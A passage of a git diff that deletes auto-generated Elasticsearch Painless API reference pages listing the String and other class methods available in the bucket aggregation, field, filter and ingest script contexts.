{java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-analysis-org-elasticsearch-analysis-common"] -=== Analysis API for package org.elasticsearch.analysis.common -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-analysis-AnalysisPredicateScript-Token]] -==== AnalysisPredicateScript.Token -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int getEndOffset() -* int getPosition() -* int getPositionIncrement() -* int getPositionLength() -* int getStartOffset() -* CharSequence getTerm() -* String getType() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean isKeyword() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc deleted file mode 100644 index f63ba71423c..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-bucket-aggregation]] -=== Bucket Aggregation API - -The following specialized API is available in the Bucket Aggregation context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc deleted file mode 100644 index e77ea8fb473..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-bucket-aggregation/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-bucket-aggregation-java-lang"] -=== Bucket Aggregation API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-bucket-aggregation-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc deleted file mode 100644 index ac04e923a89..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-field/index.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-field]] -=== Field API - -The following specialized API is available in the Field context. - -* See the <> for further API available in all contexts. - -==== Static Methods -The following methods are directly callable without a class/instance qualifier. Note parameters denoted by a (*) are treated as read-only values. - -* List domainSplit(String) -* List domainSplit(String, Map) - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc deleted file mode 100644 index bc6b6601924..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-field/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-field-java-lang"] -=== Field API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-field-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-field-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Field API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-field-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-field-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Field API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-field-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-field-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc deleted file mode 100644 index 0b69b3b1501..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-filter/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-filter]] -=== Filter API - -The following specialized API is available in the Filter context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc deleted file mode 100644 index 462566d1fb6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-filter/packages.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-filter-java-lang"] -=== Filter API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-filter-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - -[role="exclude",id="painless-api-reference-filter-org-elasticsearch-xpack-sql-expression-literal-geo"] -=== Filter API for package org.elasticsearch.xpack.sql.expression.literal.geo -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-filter-GeoShape]] -==== GeoShape -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-filter-org-elasticsearch-xpack-sql-expression-literal-interval"] -=== Filter API for package org.elasticsearch.xpack.sql.expression.literal.interval -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-filter-IntervalDayTime]] -==== IntervalDayTime -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-filter-IntervalYearMonth]] -==== IntervalYearMonth -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* String {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc deleted file mode 100644 index 7b53fe84af6..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-ingest/index.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-ingest]] -=== Ingest API - -The following specialized API is available in the Ingest context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.ingest.common -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc deleted file mode 100644 index dddb566afca..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-ingest/packages.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-ingest-java-lang"] -=== Ingest API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-ingest-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String sha1() -* String sha256() -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String 